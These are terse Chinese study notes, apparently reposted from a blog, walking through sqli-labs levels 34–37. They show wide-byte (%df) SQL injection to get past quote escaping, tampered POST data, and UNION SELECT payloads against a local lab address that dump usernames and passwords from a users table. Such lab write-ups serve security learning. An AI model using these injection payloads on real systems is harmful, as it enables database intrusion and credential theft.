less34
admin admin
ad ad
a%df’ a%df’ 登录失败
a%df\‘
uname=a%25df%5C%27&passwd=1111&submit=Submit
a%df%5C%27
删除25 改包后 再次执行一次
然后再修改包 猜列数
也可以使用第二种方法 ‘ ------> ?‘ 这里的注释符只可以使用#
LESS35
这一关基本与上一关相同,就是没有了数据包裹,所以不用‘直接进行注入:
http://192.168.50.100/sqli-labs/Less-35/?id=111 union select 1,2,
group_concat(concat_ws(0x7e,username,password)) from security.users
less36 使用宽字节注入
http://192.168.50.100/sqli-labs/Less-36/?id=11111%df‘ union select 1,2,3 --+
http://192.168.50.100/sqli-labs/Less-36/?id=11111%df‘ union select 1,2,
group_concat(concat_ws(0x7e,username,password)) from security.users --+
less 37
抓包
原文:https://www.cnblogs.com/xingyuner/p/12253341.html